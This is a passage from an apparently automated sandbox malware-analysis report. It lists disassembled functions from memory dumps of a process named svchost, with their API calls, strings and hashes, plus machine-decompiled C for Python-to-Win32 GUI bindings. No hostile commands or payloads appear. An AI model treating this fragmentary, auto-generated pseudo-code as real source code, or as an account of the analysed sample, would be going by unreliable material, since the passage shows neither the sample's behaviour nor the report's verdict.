                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$Arg_BufferErr_FormatParseReadTupleU_object@@
                            • String ID: OOk:RegisterDeviceNotification$RegisterDeviceNotification$buffer isn't a DEV_BROADCAST_* structure: structure says it has %d bytes, but %d was provided
                            • API String ID: 3170462299-3901231234
                            • Opcode ID: b75a36fe429582cc0c23098137e5a813040f391bbdfdf4815032c67820a75630
                            • Instruction ID: cc5d58f6a22bb4bb175d8cbb1309bdd2114fd4a45ac908102979de16a09a0cbc
                            • Opcode Fuzzy Hash: b75a36fe429582cc0c23098137e5a813040f391bbdfdf4815032c67820a75630
                            • Instruction Fuzzy Hash: 6521A77A508201AFDB00AB18CC45DBB37B9FF85215F888669F955C2131F731D96ACB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB7880, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:IsIconic), ref: 6DAB7897
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB78B3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB78C2
                            • IsIconic.USER32(?), ref: 6DAB78CE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB78D7
                            • Py_BuildValue.PYTHON38(6DABDEC0,00000000), ref: 6DAB78E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildIconicObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: O:IsIconic
                            • API String ID: 3185283865-1799084589
                            • Opcode ID: 41744823ddec55552b9fac61ca544ee1fe58bcf9bb8af78b88c95a515e462929
                            • Instruction ID: 1f92cc468eda087304d0c3694eec6566d1a97b0d1931a80b26b2e755dd513b35
                            • Opcode Fuzzy Hash: 41744823ddec55552b9fac61ca544ee1fe58bcf9bb8af78b88c95a515e462929
                            • Instruction Fuzzy Hash: 9FF06235808201AFDF006B65DC49A6A7BB9EF81216F044534FC85C1121E735896BCAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA92540, Relevance: 136.7, APIs: 52, Strings: 26, Instructions: 189COMMON
                            Download Yara Rule
                            APIs
                            • PyModule_Create2.PYTHON38(6DA96180,000003F5), ref: 6DA92555
                            • PyModule_GetDict.PYTHON38(00000000), ref: 6DA92568
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Module_$Create2Dict
                            • String ID: EVENT_ALL_ACCESS$EVENT_MODIFY_STATE$INFINITE$MAXIMUM_WAIT_OBJECTS$QS_ALLEVENTS$QS_ALLINPUT$QS_HOTKEY$QS_INPUT$QS_KEY$QS_MOUSE$QS_MOUSEBUTTON$QS_MOUSEMOVE$QS_PAINT$QS_POSTMESSAGE$QS_SENDMESSAGE$QS_TIMER$SYNCHRONIZE$UNICODE$WAIT_ABANDONED$WAIT_ABANDONED_0$WAIT_FAILED$WAIT_IO_COMPLETION$WAIT_OBJECT_0$WAIT_TIMEOUT$error$L)n
                            • API String ID: 1218557240-1497788517
                            • Opcode ID: 0b9b671614a9bd6b5f8de389135b69db9799f3de2bd847308cb290dc096a458e
                            • Instruction ID: 309248268fef4e18fed6dd13eb24c4da5c053b8a785c42bf24d25cca5117358f
                            • Opcode Fuzzy Hash: 0b9b671614a9bd6b5f8de389135b69db9799f3de2bd847308cb290dc096a458e
                            • Instruction Fuzzy Hash: 104110E0A5835C3DE52033B65C49F3F2D8CEF88668F055512FA2D9D1C3DDE4944089BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAC1B0, Relevance: 98.4, APIs: 29, Strings: 27, Instructions: 368COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTupleAndKeywords.PYTHON38(?,?,k|Ok,6DAC7AB8,?,?,?), ref: 6DAAC1EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_KeywordsParseTuple
                            • String ID: Action %d is not supported yet$Param must be a sequence of 3 ints$SystemParametersInfo$Unable to allocate %d bytes$iArrange$iBorderWidth$iCaptionHeight$iCaptionWidth$iHorzGap$iMenuHeight$iMenuWidth$iScrollHeight$iScrollWidth$iSmCaptionHeight$iSmCaptionWidth$iVertGap$iWidth$kkk$kkk$k|Ok$lfCaptionFont$lfMenuFont$lfMessageFont$lfSmCaptionFont$lfStatusFont${s:i,s:i,s:i,s:i,s:i,s:N,s:i,s:i,s:N,s:i,s:i,s:N,s:N,s:N}${s:i,s:i,s:i,s:i}
                            • API String ID: 3508857537-88640142
                            • Opcode ID: 3752294b2084181cbbe8dc09e90f228eba3d190ddf75ea933b901d9a2f73c826
                            • Instruction ID: 26558f35eca6cbf0043c58f0c958d7f5c2ac968a83ddae7317bb8f118e52d3f8
                            • Opcode Fuzzy Hash: 3752294b2084181cbbe8dc09e90f228eba3d190ddf75ea933b901d9a2f73c826
                            • Instruction Fuzzy Hash: F2D1C47940C302AFEB019F64CC40A2A7BF5BF45354F0C8A69F596C7262E731DA96CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA9080, Relevance: 56.1, APIs: 9, Strings: 23, Instructions: 104COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetTextMetrics), ref: 6DAA9090
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA90AC
                            • GetTextMetricsW.GDI32(?,?), ref: 6DAA90C2
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetTextMetrics,00000000), ref: 6DAA90D2
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@MetricsObject_ParseTextTupleWin_
                            • String ID: Ascent$AveCharWidth$BreakChar$CharSet$DefaultChar$Descent$DigitizedAspectX$DigitizedAspectY$ExternalLeading$FirstChar$GetTextMetrics$Height$InternalLeading$Italic$LastChar$MaxCharWidth$O:GetTextMetrics$Overhang$PitchAndFamily$StruckOut$Underlined$Weight${s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:l,s:N,s:N,s:N,s:N,s:B,s:B,s:B,s:B,s:B}
                            • API String ID: 431775070-2596769364
                            • Opcode ID: fd6337c79de06f0b6c6435fcd4149b98b539c57c30255f0334024427e8944ff2
                            • Instruction ID: 26adc5d951c0b8292f58756b298cb34ff159fcb7187465578c9b93fd4b0b8e27
                            • Opcode Fuzzy Hash: fd6337c79de06f0b6c6435fcd4149b98b539c57c30255f0334024427e8944ff2
                            • Instruction Fuzzy Hash: 653162B144C344BEDA315FA48C40FBF7AE9BF88211F445818FAD8D1122E776C5A49B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB71D0, Relevance: 50.9, APIs: 26, Strings: 3, Instructions: 197COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOOiiiiOOOO:CreateWindowEx,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB726B
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAB7289
                            • PyErr_Occurred.PYTHON38 ref: 6DAB729B
                            • ?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z.PYWINTYPES38(?,?,00000001), ref: 6DAB72B0
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAB72CE
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAB72DF
                            • PyErr_Occurred.PYTHON38 ref: 6DAB72EB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7300
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7312
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7324
                            • PyErr_SetString.PYTHON38(6E28ED8C,This param must be None), ref: 6DAB7345
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Err_$LongLong_MaskOccurredUnsigned$Arg_ParseResourceStringTuple
                            • String ID: CreateWindowEx$OOOOiiiiOOOO:CreateWindowEx$This param must be None
                            • API String ID: 1939099319-640032765
                            • Opcode ID: 3e0f887f17b8c5bfaa2d52df78d7b2283d57f6182a5f22308eec5f0f3743a5d2
                            • Instruction ID: 21db5f86720bce7d1a30609f0db1fb421a7f2c282f9915c1beb8f2104c19658d
                            • Opcode Fuzzy Hash: 3e0f887f17b8c5bfaa2d52df78d7b2283d57f6182a5f22308eec5f0f3743a5d2
                            • Instruction Fuzzy Hash: 9361DE7180C305AFDB019F50CC84B9BBBF8FF84310F544A29F94592260E775D95ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAFCE0, Relevance: 47.4, APIs: 24, Strings: 3, Instructions: 186COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOOiiiiOOOO:CreateWindow,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAAFD6B
                            • ?PyWinObject_AsResourceIdW@@YAHPAU_object@@PAPA_WH@Z.PYWINTYPES38(?,00000001,00000001), ref: 6DAAFD89
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAAFDA3
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAAFDB5
                            • PyErr_Occurred.PYTHON38 ref: 6DAAFDC5
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_Err_LongLong_MaskOccurredParseResourceTupleUnsigned
                            • String ID: CreateWindow$OOOiiiiOOOO:CreateWindow$This param must be None
                            • API String ID: 1517206388-4014081329
                            • Opcode ID: 6a64ce8d53431c5d5c603a6ad2c2184da3d6c1e8ef2af6da5f80398625d68b37
                            • Instruction ID: 1ec64070e34e5c1ed1e4777995073f4635bd67e322cb3a7655ed2423c43c2a6e
                            • Opcode Fuzzy Hash: 6a64ce8d53431c5d5c603a6ad2c2184da3d6c1e8ef2af6da5f80398625d68b37
                            • Instruction Fuzzy Hash: 96618A7240C301AFDB019F54CC84BAB7BF8FF85315F484A2DF99592260E731D95A8B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA8D60, Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 180windowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi|i,?,?), ref: 6DAA8D81
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAA8DA1
                            • ExtractIconExW.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 6DAA8DC1
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAA8DCF
                            • PyLong_FromLong.PYTHON38(?), ref: 6DAA8DD9
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$Arg_ExtractFreeFromIconLongLong_ParseTupleU_object@@
                            • String ID: ExtractIconEx$Must supply a valid number of icons to fetch.$Oi|i
                            • API String ID: 2680033120-1399554263
                            • Opcode ID: 7bcf88cf5127dd764d82cef0f16205e145a0cc93b6e4d4e96e25a436258ae7c7
                            • Instruction ID: 35829dda170d957496f30df629b804726df979e0aecd15b6cc849ed4cda22fc5
                            • Opcode Fuzzy Hash: 7bcf88cf5127dd764d82cef0f16205e145a0cc93b6e4d4e96e25a436258ae7c7
                            • Instruction Fuzzy Hash: 3451BF7450D3429FCB009F24CC84B6A7BB1FF85311F088728F9A992261E7329966DB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA69F0, Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 116COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E6DAA69F0(intOrPtr _a8) {
				void _v96;
				char _v108;
				void _v120;
				char _v124;
				void* _v128;
				void* _v132;
				intOrPtr _v136;
				char* _t17;
				void** _t19;
				long _t20;
				void* _t21;
				int _t23;
				void* _t24;
				int _t26;
				intOrPtr _t27;
				int _t31;
				intOrPtr _t32;
				long _t35;
				void** _t41;

				_t17 =  &_v124;
				__imp__PyArg_ParseTuple(_a8, "O", _t17);
				_t41 =  &(( &_v128)[3]);
				if(_t17 == 0) {
					L8:
					return 0;
				} else {
					_t19 = _t41;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v124, _t19);
					if(_t19 == 0) {
						goto L8;
					} else {
						_t20 = GetObjectType(_v128);
						_t35 = _t20;
						if(_t35 != 0) {
							_t21 = _t20 - 1;
							if(_t21 == 0) {
								_t23 = GetObjectW(_v132, 0x10,  &_v120);
								if(_t23 != 0) {
									__imp__Py_BuildValue("{s:I, s:l, s:k}", "Style", _v132, "Width", _v128, "Color", _v120);
									return _t23;
								} else {
									__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetObject", _t23);
									return _t23;
								}
							} else {
								_t24 = _t21 - 5;
								if(_t24 == 0) {
									_t26 = GetObjectW(_v132, 0x5c,  &_v96);
									if(_t26 != 0) {
										_t27 = E6DAB974E(0x64);
										_v136 = _t27;
										if(_t27 == 0) {
											goto L8;
										} else {
											return E6DAA6510(_t27,  &_v108);
										}
									} else {
										__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetObject", _t26);
										return _t26;
									}
								} else {
									if(_t24 == 1) {
										_t31 = GetObjectW(_v132, 0x18,  &_v120);
										if(_t31 != 0) {
											_t32 = E6DAB974E(0x20);
											_v136 = _t32;
											if(_t32 == 0) {
												goto L8;
											} else {
												return E6DAA6360(_t32,  &_v132);
											}
										} else {
											__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetObject", _t31);
											return _t31;
										}
									} else {
										__imp__PyErr_Format( *__imp__PyExc_ValueError, "This GDI object type is not supported: %d", _t35);
										goto L8;
									}
								}
							}
						} else {
							__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetObjectType", _t20);
							return _t20;
						}
					}
				}
			}






















                            0x6daa69f6
                            0x6daa6a07
                            0x6daa6a0d
                            0x6daa6a12
                            0x6daa6a77
                            0x6daa6a7f
                            0x6daa6a14
                            0x6daa6a14
                            0x6daa6a1c
                            0x6daa6a27
                            0x00000000
                            0x6daa6a29
                            0x6daa6a2c
                            0x6daa6a32
                            0x6daa6a36
                            0x6daa6a4e
                            0x6daa6a51
                            0x6daa6b2f
                            0x6daa6b37
                            0x6daa6b6f
                            0x6daa6b7e
                            0x6daa6b39
                            0x6daa6b3f
                            0x6daa6b4e
                            0x6daa6b4e
                            0x6daa6a57
                            0x6daa6a57
                            0x6daa6a5a
                            0x6daa6adb
                            0x6daa6ae3
                            0x6daa6afd
                            0x6daa6b05
                            0x6daa6b0b
                            0x00000000
                            0x6daa6b11
                            0x6daa6b23
                            0x6daa6b23
                            0x6daa6ae5
                            0x6daa6aeb
                            0x6daa6afa
                            0x6daa6afa
                            0x6daa6a5c
                            0x6daa6a5f
                            0x6daa6a8b
                            0x6daa6a93
                            0x6daa6aad
                            0x6daa6ab5
                            0x6daa6abb
                            0x00000000
                            0x6daa6abd
                            0x6daa6acf
                            0x6daa6acf
                            0x6daa6a95
                            0x6daa6a9b
                            0x6daa6aaa
                            0x6daa6aaa
                            0x6daa6a61
                            0x6daa6a6e
                            0x00000000
                            0x6daa6a74
                            0x6daa6a5f
                            0x6daa6a5a
                            0x6daa6a38
                            0x6daa6a3e
                            0x6daa6a4d
                            0x6daa6a4d
                            0x6daa6a36
                            0x6daa6a27

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,6DABBB6C,?), ref: 6DAA6A07
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,00000000), ref: 6DAA6A1C
                            • GetObjectType.GDI32 ref: 6DAA6A2C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetObjectType,00000000), ref: 6DAA6A3E
                            • PyErr_Format.PYTHON38(6E28ED94,This GDI object type is not supported: %d,00000000), ref: 6DAA6A6E
                            • GetObjectW.GDI32(?,00000018,?), ref: 6DAA6A8B
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetObject,00000000), ref: 6DAA6A9B
                            • new.LIBCMT ref: 6DAA6AAD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Error@@ObjectWin_$Arg_Err_FormatObject_ParseTupleType
                            • String ID: Color$GetObject$GetObject$GetObject$GetObjectType$Style$This GDI object type is not supported: %d$Width${s:I, s:l, s:k}
                            • API String ID: 1957364368-3235274994
                            • Opcode ID: 7ea0bb9f81407e944d96b0a8a737be1a3db9744c8ca26f5aa6e2efa9350d7908
                            • Instruction ID: 08685435dd9b31a39615acb762ed7ecefada85cec0e2044c2747f9244d819b8b
                            • Opcode Fuzzy Hash: 7ea0bb9f81407e944d96b0a8a737be1a3db9744c8ca26f5aa6e2efa9350d7908
                            • Instruction Fuzzy Hash: AB318AB590C302AFDB005F28DC55B767AB8BF45341F4CC624F955C1261FB35C56A8B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAB0D0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 170COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetPath,?), ref: 6DAAB0E9
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAB105
                            • GetPath.GDI32(?,00000000,00000000,00000000), ref: 6DAAB124
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetPath,00000000), ref: 6DAAB134
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParsePathTupleWin_
                            • String ID: GetPath$GetPath$O:GetPath$Unable to allocate %d bytes$Unable to allocate %d bytes
                            • API String ID: 879478881-1736508514
                            • Opcode ID: 4017b65557026358c00ff7260bda2f8d780d457be72e78586d4b73811e231257
                            • Instruction ID: 07e3d6078df1f29e87207eb97844838d5e8de298c5ffd96c786a6eab8ff0f5fc
                            • Opcode Fuzzy Hash: 4017b65557026358c00ff7260bda2f8d780d457be72e78586d4b73811e231257
                            • Instruction Fuzzy Hash: 5451C3719083059FDB10DF689C80B6A77F4BF85364F080729FC6593261E735E95A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB49A0, Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 136COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOii:DrawEdge,00000000,?), ref: 6DAB49D7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB49F0
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB4A2B
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers,DrawEdge), ref: 6DAB4A45
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_ParseTuple$Err_FormatObject_U_object@@
                            • String ID: %s: This param must be a tuple of four integers$%s: This param must be a tuple of four integers$DrawEdge$DrawEdge$DrawEdge$OOii:DrawEdge$llll$llll
                            • API String ID: 1273418297-3484087582
                            • Opcode ID: a13eed2c4d5936b3e156152087ae530b02a175cd921357aa246243191b0840af
                            • Instruction ID: 87a04097cb19525ae796b2d313d6a1fe1e6b8bf518dc0ac06819c81d25b91e37
                            • Opcode Fuzzy Hash: a13eed2c4d5936b3e156152087ae530b02a175cd921357aa246243191b0840af
                            • Instruction Fuzzy Hash: F041D67650C301AFCB019B25CCC4EAB7BFDFF89219F484629F94992121E731D9978B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA7920, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 132COMMON
                            Download Yara Rule
                            C-Code - Quality: 19%
                            			E6DAA7920(intOrPtr _a8) {
				struct HINSTANCE__* _v4;
				struct HWND__* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char* _t26;
				signed int _t28;
				signed int _t31;
				intOrPtr _t32;
				void* _t33;
				long _t34;
				void* _t37;
				void* _t38;
				intOrPtr* _t39;
				DLGTEMPLATE* _t41;
				int _t42;
				void* _t47;
				void* _t52;
				intOrPtr* _t53;
				void* _t61;
				long _t62;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t70;

				_t64 =  &_v28;
				_v28 = __imp___Py_NoneStruct;
				_t26 =  &_v24;
				__imp__PyArg_ParseTuple(_a8, "OOOO|O", _t26,  &_v16,  &_v20,  &_v12, _t64);
				_t65 = _t64 + 0x1c;
				if(_t26 != 0) {
					_t53 = __imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z;
					_t28 =  *_t53(_v24,  &_v4, _t52);
					_t66 = _t65 + 8;
					__eflags = _t28;
					if(_t28 == 0) {
						L4:
						__eflags = 0;
						return 0;
					} else {
						_t31 =  *_t53(_v20,  &_v8);
						_t67 = _t66 + 8;
						__eflags = _t31;
						if(_t31 != 0) {
							_t32 = _v28;
							__eflags = _t32 - __imp___Py_NoneStruct; // 0x6e294ce8
							if(__eflags == 0) {
								L8:
								_t33 = E6DAA5280(_t32, _v16);
								_t47 = _t33;
								_t68 = _t67 + 4;
								__eflags = _t47;
								if(_t47 != 0) {
									_t34 = GlobalLock(_t47);
									_t41 = _t34;
									__eflags = _t41;
									if(_t41 != 0) {
										__imp__Py_BuildValue("OO", _v12, _v28, _t61);
										_t62 = _t34;
										__imp__PyEval_SaveThread();
										_t42 = DialogBoxIndirectParamW(_v4, _t41, _v8, E6DAA5B50, _t62);
										GlobalUnlock(_t47);
										_t37 = GlobalFree(_t47);
										__imp__PyEval_RestoreThread(_t34);
										_t70 = _t68 + 0x10;
										 *_t62 =  *_t62 + 0xffffffff;
										__eflags =  *_t62;
										if( *_t62 == 0) {
											__imp___Py_Dealloc(_t62);
											_t70 = _t70 + 4;
										}
										__eflags = _t42 - 0xffffffff;
										if(_t42 != 0xffffffff) {
											__imp__?PyWinLong_FromVoidPtr@@YAPAU_object@@PBX@Z(_t42);
											return _t37;
										} else {
											__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("DialogBoxIndirect", 0);
											return _t37;
										}
									} else {
										_t38 = GlobalFree(_t47);
										__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GlobalLock (for template)", _t41);
										return _t38;
									}
								} else {
									return _t33;
								}
							} else {
								_t32 =  *((intOrPtr*)(_t32 + 4));
								__eflags =  *(_t32 + 0x54) & 0x01000000;
								if(( *(_t32 + 0x54) & 0x01000000) != 0) {
									goto L8;
								} else {
									_t39 = __imp__PyExc_TypeError;
									__imp__PyErr_Format( *_t39, "optional param must be None, or an integer (got %s)",  *((intOrPtr*)(_t32 + 0xc)));
									return _t39;
								}
							}
						} else {
							goto L4;
						}
					}
				} else {
					return _t26;
				}
			}
































                            0x6daa7920
                            0x6daa7928
                            0x6daa793e
                            0x6daa794c
